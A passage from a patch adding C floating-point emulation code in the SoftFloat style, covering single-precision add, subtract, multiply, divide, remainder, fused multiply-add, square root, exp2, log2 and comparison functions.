) { + --expDiff; + } + else { + bSig |= 0x20000000; + } + shift32RightJamming( bSig, expDiff, &bSig ); + zExp = aExp; + } + else if ( expDiff < 0 ) { + if ( bExp == 0xFF ) { + if ( bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return packFloat32( zSign, 0xFF, 0 ); + } + if ( aExp == 0 ) { + ++expDiff; + } + else { + aSig |= 0x20000000; + } + shift32RightJamming( aSig, - expDiff, &aSig ); + zExp = bExp; + } + else { + if ( aExp == 0xFF ) { + if ( aSig | bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return a; + } + if ( aExp == 0 ) { + if (STATUS(flush_to_zero)) { + if (aSig | bSig) { + float_raise(float_flag_output_denormal STATUS_VAR); + } + return packFloat32(zSign, 0, 0); + } + return packFloat32( zSign, 0, ( aSig + bSig )>>6 ); + } + zSig = 0x40000000 + aSig + bSig; + zExp = aExp; + goto roundAndPack; + } + aSig |= 0x20000000; + zSig = ( aSig + bSig )<<1; + --zExp; + if ( (int32_t) zSig < 0 ) { + zSig = aSig + bSig; + ++zExp; + } + roundAndPack: + return roundAndPackFloat32( zSign, zExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of subtracting the absolute values of the single- +| precision floating-point values `a' and `b'. If `zSign' is 1, the +| difference is negated before being returned. `zSign' is ignored if the +| result is a NaN. The subtraction is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static float32 subFloat32Sigs( float32 a, float32 b, flag zSign STATUS_PARAM) +{ + int_fast16_t aExp, bExp, zExp; + uint32_t aSig, bSig, zSig; + int_fast16_t expDiff; + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + bSig = extractFloat32Frac( b ); + bExp = extractFloat32Exp( b ); + expDiff = aExp - bExp; + aSig <<= 7; + bSig <<= 7; + if ( 0 < expDiff ) goto aExpBigger; + if ( expDiff < 0 ) goto bExpBigger; + if ( aExp == 0xFF ) { + if ( aSig | bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + if ( aExp == 0 ) { + aExp = 1; + bExp = 1; + } + if ( bSig < aSig ) goto aBigger; + if ( aSig < bSig ) goto bBigger; + return packFloat32( STATUS(float_rounding_mode) == float_round_down, 0, 0 ); + bExpBigger: + if ( bExp == 0xFF ) { + if ( bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return packFloat32( zSign ^ 1, 0xFF, 0 ); + } + if ( aExp == 0 ) { + ++expDiff; + } + else { + aSig |= 0x40000000; + } + shift32RightJamming( aSig, - expDiff, &aSig ); + bSig |= 0x40000000; + bBigger: + zSig = bSig - aSig; + zExp = bExp; + zSign ^= 1; + goto normalizeRoundAndPack; + aExpBigger: + if ( aExp == 0xFF ) { + if ( aSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) { + --expDiff; + } + else { + bSig |= 0x40000000; + } + shift32RightJamming( bSig, expDiff, &bSig ); + aSig |= 0x40000000; + aBigger: + zSig = aSig - bSig; + zExp = aExp; + normalizeRoundAndPack: + --zExp; + return normalizeRoundAndPackFloat32( zSign, zExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of adding the single-precision floating-point values `a' +| and `b'. The operation is performed according to the IEC/IEEE Standard for +| Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 float32_add( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + aSign = extractFloat32Sign( a ); + bSign = extractFloat32Sign( b ); + if ( aSign == bSign ) { + return addFloat32Sigs( a, b, aSign STATUS_VAR); + } + else { + return subFloat32Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of subtracting the single-precision floating-point values +| `a' and `b'. The operation is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 float32_sub( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + aSign = extractFloat32Sign( a ); + bSign = extractFloat32Sign( b ); + if ( aSign == bSign ) { + return subFloat32Sigs( a, b, aSign STATUS_VAR ); + } + else { + return addFloat32Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of multiplying the single-precision floating-point values +| `a' and `b'. The operation is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 float32_mul( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign, zSign; + int_fast16_t aExp, bExp, zExp; + uint32_t aSig, bSig; + uint64_t zSig64; + uint32_t zSig; + + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + bSig = extractFloat32Frac( b ); + bExp = extractFloat32Exp( b ); + bSign = extractFloat32Sign( b ); + zSign = aSign ^ bSign; + if ( aExp == 0xFF ) { + if ( aSig || ( ( bExp == 0xFF ) && bSig ) ) { + return propagateFloat32NaN( a, b STATUS_VAR ); + } + if ( ( bExp | bSig ) == 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + return packFloat32( zSign, 0xFF, 0 ); + } + if ( bExp == 0xFF ) { + if ( bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + if ( ( aExp | aSig ) == 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + return packFloat32( zSign, 0xFF, 0 ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat32( zSign, 0, 0 ); + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + } + if ( bExp == 0 ) { + if ( bSig == 0 ) return packFloat32( zSign, 0, 0 ); + normalizeFloat32Subnormal( bSig, &bExp, &bSig ); + } + zExp = aExp + bExp - 0x7F; + aSig = ( aSig | 0x00800000 )<<7; + bSig = ( bSig | 0x00800000 )<<8; + shift64RightJamming( ( (uint64_t) aSig ) * bSig, 32, &zSig64 ); + zSig = (uint32_t)zSig64; + if ( 0 <= (int32_t) ( zSig<<1 ) ) { + zSig <<= 1; + --zExp; + } + return roundAndPackFloat32( zSign, zExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of dividing the single-precision floating-point value `a' +| by the corresponding value `b'. The operation is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 float32_div( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign, zSign; + int_fast16_t aExp, bExp, zExp; + uint32_t aSig, bSig, zSig; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + bSig = extractFloat32Frac( b ); + bExp = extractFloat32Exp( b ); + bSign = extractFloat32Sign( b ); + zSign = aSign ^ bSign; + if ( aExp == 0xFF ) { + if ( aSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + if ( bExp == 0xFF ) { + if ( bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + return packFloat32( zSign, 0xFF, 0 ); + } + if ( bExp == 0xFF ) { + if ( bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return packFloat32( zSign, 0, 0 ); + } + if ( bExp == 0 ) { + if ( bSig == 0 ) { + if ( ( aExp | aSig ) == 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + float_raise( float_flag_divbyzero STATUS_VAR); + return packFloat32( zSign, 0xFF, 0 ); + } + normalizeFloat32Subnormal( bSig, &bExp, &bSig ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat32( zSign, 0, 0 ); + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + } + zExp = aExp - bExp + 0x7D; + aSig = ( aSig | 0x00800000 )<<7; + bSig = ( bSig | 0x00800000 )<<8; + if ( bSig <= ( aSig + aSig ) ) { + aSig >>= 1; + ++zExp; + } + zSig = ( ( (uint64_t) aSig )<<32 ) / bSig; + if ( ( zSig & 0x3F ) == 0 ) { + zSig |= ( (uint64_t) bSig * zSig != ( (uint64_t) aSig )<<32 ); + } + return roundAndPackFloat32( zSign, zExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the remainder of the single-precision floating-point value `a' +| with respect to the corresponding value `b'. The operation is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 float32_rem( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, zSign; + int_fast16_t aExp, bExp, expDiff; + uint32_t aSig, bSig; + uint32_t q; + uint64_t aSig64, bSig64, q64; + uint32_t alternateASig; + int32_t sigMean; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + bSig = extractFloat32Frac( b ); + bExp = extractFloat32Exp( b ); + if ( aExp == 0xFF ) { + if ( aSig || ( ( bExp == 0xFF ) && bSig ) ) { + return propagateFloat32NaN( a, b STATUS_VAR ); + } + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + if ( bExp == 0xFF ) { + if ( bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) { + if ( bSig == 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + normalizeFloat32Subnormal( bSig, &bExp, &bSig ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return a; + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + } + expDiff = aExp - bExp; + aSig |= 0x00800000; + bSig |= 0x00800000; + if ( expDiff < 32 ) { + aSig <<= 8; + bSig <<= 8; + if ( expDiff < 0 ) { + if ( expDiff < -1 ) return a; + aSig >>= 1; + } + q = ( bSig <= aSig ); + if ( q ) aSig -= bSig; + if ( 0 < expDiff ) { + q = ( ( (uint64_t) aSig )<<32 ) / bSig; + q >>= 32 - expDiff; + bSig >>= 2; + aSig = ( ( aSig>>1 )<<( expDiff - 1 ) ) - bSig * q; + } + else { + aSig >>= 2; + bSig >>= 2; + } + } + else { + if ( bSig <= aSig ) aSig -= bSig; + aSig64 = ( (uint64_t) aSig )<<40; + bSig64 = ( (uint64_t) bSig )<<40; + expDiff -= 64; + while ( 0 < expDiff ) { + q64 = estimateDiv128To64( aSig64, 0, bSig64 ); + q64 = ( 2 < q64 ) ? q64 - 2 : 0; + aSig64 = 0- ( ( bSig * q64 )<<38 ); + expDiff -= 62; + } + expDiff += 64; + q64 = estimateDiv128To64( aSig64, 0, bSig64 ); + q64 = ( 2 < q64 ) ? q64 - 2 : 0; + q = (uint32_t)(q64>>( 64 - expDiff )); + bSig <<= 6; + aSig = ( ( aSig64>>33 )<<( expDiff - 1 ) ) - bSig * q; + } + do { + alternateASig = aSig; + ++q; + aSig -= bSig; + } while ( 0 <= (int32_t) aSig ); + sigMean = aSig + alternateASig; + if ( ( sigMean < 0 ) || ( ( sigMean == 0 ) && ( q & 1 ) ) ) { + aSig = alternateASig; + } + zSign = ( (int32_t) aSig < 0 ); + if ( zSign ) aSig = 0- aSig; + return normalizeRoundAndPackFloat32( aSign ^ zSign, bExp, aSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of multiplying the single-precision floating-point values +| `a' and `b' then adding 'c', with no intermediate rounding step after the +| multiplication. The operation is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic 754-2008. +| The flags argument allows the caller to select negation of the +| addend, the intermediate product, or the final result. (The difference +| between this and having the caller do a separate negation is that negating +| externally will flip the sign bit on NaNs.) +*----------------------------------------------------------------------------*/ + +float32 float32_muladd(float32 a, float32 b, float32 c, int flags STATUS_PARAM) +{ + flag aSign, bSign, cSign, zSign; + int_fast16_t aExp, bExp, cExp, pExp, zExp, expDiff; + uint32_t aSig, bSig, cSig; + flag pInf, pZero, pSign; + uint64_t pSig64, cSig64, zSig64; + uint32_t pSig; + int shiftcount; + flag signflip, infzero; + + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + c = float32_squash_input_denormal(c STATUS_VAR); + aSig = extractFloat32Frac(a); + aExp = extractFloat32Exp(a); + aSign = extractFloat32Sign(a); + bSig = extractFloat32Frac(b); + bExp = extractFloat32Exp(b); + bSign = extractFloat32Sign(b); + cSig = extractFloat32Frac(c); + cExp = extractFloat32Exp(c); + cSign = extractFloat32Sign(c); + + infzero = ((aExp == 0 && aSig == 0 && bExp == 0xff && bSig == 0) || + (aExp == 0xff && aSig == 0 && bExp == 0 && bSig == 0)); + + /* It is implementation-defined whether the cases of (0,inf,qnan) + * and (inf,0,qnan) raise InvalidOperation or not (and what QNaN + * they return if they do), so we have to hand this information + * off to the target-specific pick-a-NaN routine. + */ + if (((aExp == 0xff) && aSig) || + ((bExp == 0xff) && bSig) || + ((cExp == 0xff) && cSig)) { + return propagateFloat32MulAddNaN(a, b, c, infzero STATUS_VAR); + } + + if (infzero) { + float_raise(float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + + if (flags & float_muladd_negate_c) { + cSign ^= 1; + } + + signflip = (flags & float_muladd_negate_result) ? 1 : 0; + + /* Work out the sign and type of the product */ + pSign = aSign ^ bSign; + if (flags & float_muladd_negate_product) { + pSign ^= 1; + } + pInf = (aExp == 0xff) || (bExp == 0xff); + pZero = ((aExp | aSig) == 0) || ((bExp | bSig) == 0); + + if (cExp == 0xff) { + if (pInf && (pSign ^ cSign)) { + /* addition of opposite-signed infinities => InvalidOperation */ + float_raise(float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + /* Otherwise generate an infinity of the same sign */ + return packFloat32(cSign ^ signflip, 0xff, 0); + } + + if (pInf) { + return packFloat32(pSign ^ signflip, 0xff, 0); + } + + if (pZero) { + if (cExp == 0) { + if (cSig == 0) { + /* Adding two exact zeroes */ + if (pSign == cSign) { + zSign = pSign; + } else if (STATUS(float_rounding_mode) == float_round_down) { + zSign = 1; + } else { + zSign = 0; + } + return packFloat32(zSign ^ signflip, 0, 0); + } + /* Exact zero plus a denorm */ + if (STATUS(flush_to_zero)) { + float_raise(float_flag_output_denormal STATUS_VAR); + return packFloat32(cSign ^ signflip, 0, 0); + } + } + /* Zero plus something non-zero : just return the something */ + if (flags & float_muladd_halve_result) { + if (cExp == 0) { + normalizeFloat32Subnormal(cSig, &cExp, &cSig); + } + /* Subtract one to halve, and one again because roundAndPackFloat32 + * wants one less than the true exponent. + */ + cExp -= 2; + cSig = (cSig | 0x00800000) << 7; + return roundAndPackFloat32(cSign ^ signflip, cExp, cSig STATUS_VAR); + } + return packFloat32(cSign ^ signflip, cExp, cSig); + } + + if (aExp == 0) { + normalizeFloat32Subnormal(aSig, &aExp, &aSig); + } + if (bExp == 0) { + normalizeFloat32Subnormal(bSig, &bExp, &bSig); + } + + /* Calculate the actual result a * b + c */ + + /* Multiply first; this is easy. */ + /* NB: we subtract 0x7e where float32_mul() subtracts 0x7f + * because we want the true exponent, not the "one-less-than" + * flavour that roundAndPackFloat32() takes. + */ + pExp = aExp + bExp - 0x7e; + aSig = (aSig | 0x00800000) << 7; + bSig = (bSig | 0x00800000) << 8; + pSig64 = (uint64_t)aSig * bSig; + if ((int64_t)(pSig64 << 1) >= 0) { + pSig64 <<= 1; + pExp--; + } + + zSign = pSign ^ signflip; + + /* Now pSig64 is the significand of the multiply, with the explicit bit in + * position 62. + */ + if (cExp == 0) { + if (!cSig) { + /* Throw out the special case of c being an exact zero now */ + shift64RightJamming(pSig64, 32, &pSig64); + pSig = (uint32_t)pSig64; + if (flags & float_muladd_halve_result) { + pExp--; + } + return roundAndPackFloat32(zSign, pExp - 1, + pSig STATUS_VAR); + } + normalizeFloat32Subnormal(cSig, &cExp, &cSig); + } + + cSig64 = (uint64_t)cSig << (62 - 23); + cSig64 |= LIT64(0x4000000000000000); + expDiff = pExp - cExp; + + if (pSign == cSign) { + /* Addition */ + if (expDiff > 0) { + /* scale c to match p */ + shift64RightJamming(cSig64, expDiff, &cSig64); + zExp = pExp; + } else if (expDiff < 0) { + /* scale p to match c */ + shift64RightJamming(pSig64, -expDiff, &pSig64); + zExp = cExp; + } else { + /* no scaling needed */ + zExp = cExp; + } + /* Add significands and make sure explicit bit ends up in posn 62 */ + zSig64 = pSig64 + cSig64; + if ((int64_t)zSig64 < 0) { + shift64RightJamming(zSig64, 1, &zSig64); + } else { + zExp--; + } + } else { + /* Subtraction */ + if (expDiff > 0) { + shift64RightJamming(cSig64, expDiff, &cSig64); + zSig64 = pSig64 - cSig64; + zExp = pExp; + } else if (expDiff < 0) { + shift64RightJamming(pSig64, -expDiff, &pSig64); + zSig64 = cSig64 - pSig64; + zExp = cExp; + zSign ^= 1; + } else { + zExp = pExp; + if (cSig64 < pSig64) { + zSig64 = pSig64 - cSig64; + } else if (pSig64 < cSig64) { + zSig64 = cSig64 - pSig64; + zSign ^= 1; + } else { + /* Exact zero */ + zSign = signflip; + if (STATUS(float_rounding_mode) == float_round_down) { + zSign ^= 1; + } + return packFloat32(zSign, 0, 0); + } + } + --zExp; + /* Normalize to put the explicit bit back into bit 62. */ + shiftcount = countLeadingZeros64(zSig64) - 1; + zSig64 <<= shiftcount; + zExp -= shiftcount; + } + if (flags & float_muladd_halve_result) { + zExp--; + } + + shift64RightJamming(zSig64, 32, &zSig64); + return roundAndPackFloat32(zSign, zExp, (uint32_t)zSig64 STATUS_VAR); +} + + +/*---------------------------------------------------------------------------- +| Returns the square root of the single-precision floating-point value `a'. +| The operation is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 float32_sqrt( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, zExp; + uint32_t aSig, zSig; + uint64_t rem, term; + a = float32_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + if ( aExp == 0xFF ) { + if ( aSig ) return propagateFloat32NaN( a, float32_zero STATUS_VAR ); + if ( ! aSign ) return a; + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + if ( aSign ) { + if ( ( aExp | aSig ) == 0 ) return a; + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return float32_zero; + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + } + zExp = ( ( aExp - 0x7F )>>1 ) + 0x7E; + aSig = ( aSig | 0x00800000 )<<8; + zSig = estimateSqrt32( aExp, aSig ) + 2; + if ( ( zSig & 0x7F ) <= 5 ) { + if ( zSig < 2 ) { + zSig = 0x7FFFFFFF; + goto roundAndPack; + } + aSig >>= aExp & 1; + term = ( (uint64_t) zSig ) * zSig; + rem = ( ( (uint64_t) aSig )<<32 ) - term; + while ( (int64_t) rem < 0 ) { + --zSig; + rem += ( ( (uint64_t) zSig )<<1 ) | 1; + } + zSig |= ( rem != 0 ); + } + shift32RightJamming( zSig, 1, &zSig ); + roundAndPack: + return roundAndPackFloat32( 0, zExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the binary exponential of the single-precision floating-point value +| `a'. The operation is performed according to the IEC/IEEE Standard for +| Binary Floating-Point Arithmetic. +| +| Uses the following identities: +| +| 1. ------------------------------------------------------------------------- +| x x*ln(2) +| 2 = e +| +| 2. ------------------------------------------------------------------------- +| 2 3 4 5 n +| x x x x x x x +| e = 1 + --- + --- + --- + --- + --- + ... + --- + ... +| 1! 2! 3! 4! 5! n! +*----------------------------------------------------------------------------*/ + +static const float64 float32_exp2_coefficients[15] = +{ + const_float64( 0x3ff0000000000000ll ), /* 1 */ + const_float64( 0x3fe0000000000000ll ), /* 2 */ + const_float64( 0x3fc5555555555555ll ), /* 3 */ + const_float64( 0x3fa5555555555555ll ), /* 4 */ + const_float64( 0x3f81111111111111ll ), /* 5 */ + const_float64( 0x3f56c16c16c16c17ll ), /* 6 */ + const_float64( 0x3f2a01a01a01a01all ), /* 7 */ + const_float64( 0x3efa01a01a01a01all ), /* 8 */ + const_float64( 0x3ec71de3a556c734ll ), /* 9 */ + const_float64( 0x3e927e4fb7789f5cll ), /* 10 */ + const_float64( 0x3e5ae64567f544e4ll ), /* 11 */ + const_float64( 0x3e21eed8eff8d898ll ), /* 12 */ + const_float64( 0x3de6124613a86d09ll ), /* 13 */ + const_float64( 0x3da93974a8c07c9dll ), /* 14 */ + const_float64( 0x3d6ae7f3e733b81fll ), /* 15 */ +}; + +float32 float32_exp2( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint32_t aSig; + float64 r, x, xn; + int i; + a = float32_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + + if ( aExp == 0xFF) { + if ( aSig ) return propagateFloat32NaN( a, float32_zero STATUS_VAR ); + return (aSign) ? float32_zero : a; + } + if (aExp == 0) { + if (aSig == 0) return float32_one; + } + + float_raise( float_flag_inexact STATUS_VAR); + + /* ******************************* */ + /* using float64 for approximation */ + /* ******************************* */ + x = float32_to_float64(a STATUS_VAR); + x = float64_mul(x, float64_ln2 STATUS_VAR); + + xn = x; + r = float64_one; + for (i = 0 ; i < 15 ; i++) { + float64 f; + + f = float64_mul(xn, float32_exp2_coefficients[i] STATUS_VAR); + r = float64_add(r, f STATUS_VAR); + + xn = float64_mul(xn, x STATUS_VAR); + } + + return float64_to_float32(r, status); +} + +/*---------------------------------------------------------------------------- +| Returns the binary log of the single-precision floating-point value `a'. +| The operation is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ +float32 float32_log2( float32 a STATUS_PARAM ) +{ + flag aSign, zSign; + int_fast16_t aExp; + uint32_t aSig, zSig, i; + + a = float32_squash_input_denormal(a STATUS_VAR); + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat32( 1, 0xFF, 0 ); + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + } + if ( aSign ) { + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + if ( aExp == 0xFF ) { + if ( aSig ) return propagateFloat32NaN( a, float32_zero STATUS_VAR ); + return a; + } + + aExp -= 0x7F; + aSig |= 0x00800000; + zSign = aExp < 0; + zSig = aExp << 23; + + for (i = 1 << 22; i > 0; i >>= 1) { + aSig = ( (uint64_t)aSig * aSig ) >> 23; + if ( aSig & 0x01000000 ) { + aSig >>= 1; + zSig |= i; + } + } + + if ( zSign ) + zSig = 0-zSig; + + return normalizeRoundAndPackFloat32( zSign, 0x85, zSig STATUS_VAR ); +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is equal to +| the corresponding value `b', and 0 otherwise. The invalid exception is +| raised if either operand is a NaN. Otherwise, the comparison is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float32_eq( float32 a, float32 b STATUS_PARAM ) +{ + uint32_t av, bv; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + av = float32_val(a); + bv = float32_val(b); + return ( av == bv ) || ( (uint32_t) ( ( av | bv )<<1 ) == 0 ); +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is less than +| or equal to the corresponding value `b', and 0 otherwise. The invalid +| exception is raised if either operand is a NaN. The comparison is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float32_le( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint32_t av, bv; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloat32Sign( a ); + bSign = extractFloat32Sign( b ); + av = float32_val(a); + bv = float32_val(b); + if ( aSign != bSign ) return aSign || ( (uint32_t) ( ( av | bv )<<1 ) == 0 ); + return ( av == bv ) || ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is less than +| the corresponding value `b', and 0 otherwise. The invalid exception is +| raised if either operand is a NaN. The comparison is performed according +| to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float32_lt( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint32_t av, bv; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloat32Sign( a ); + bSign = extractFloat32Sign( b ); + av = float32_val(a); + bv = float32_val(b); + if ( aSign != bSign ) return aSign && ( (uint32_t) ( ( av | bv )<<1 ) != 0 ); + return ( av != bv ) && ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point values `a' and `b' cannot +| be compared, and 0 otherwise. The invalid exception is raised if either +| operand is a NaN. The comparison is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float32_unordered( float32 a, float32 b STATUS_PARAM ) +{ + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 1; + } + return 0; +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is equal to +| the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an +| exception. The comparison is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float32_eq_quiet( float32 a, float32 b STATUS_PARAM ) +{ + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + if ( float32_is_signaling_nan( a ) || float32_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + return ( float32_val(a) == float32_val(b) ) || + ( (uint32_t) ( ( float32_val(a) | float32_val(b) )<<1 ) == 0 ); +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is less than or +| equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not +| cause an exception. Otherwise, the comparison is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float32_le_quiet( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint32_t av, bv; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + if ( float32_is_signaling_nan( a ) || float32_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloat32Sign( a ); + bSign = extractFloat32Sign( b ); + av = float32_val(a); + bv = float32_val(b); + if ( aSign != bSign ) return aSign || ( (uint32_t) ( ( av | bv )<<1 ) == 0 ); + return ( av == bv ) || ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is less than +| the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an +| exception. Otherwise, the comparison is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float32_lt_quiet( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint32_t av, bv; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + if ( float32_is_signaling_nan( a ) || 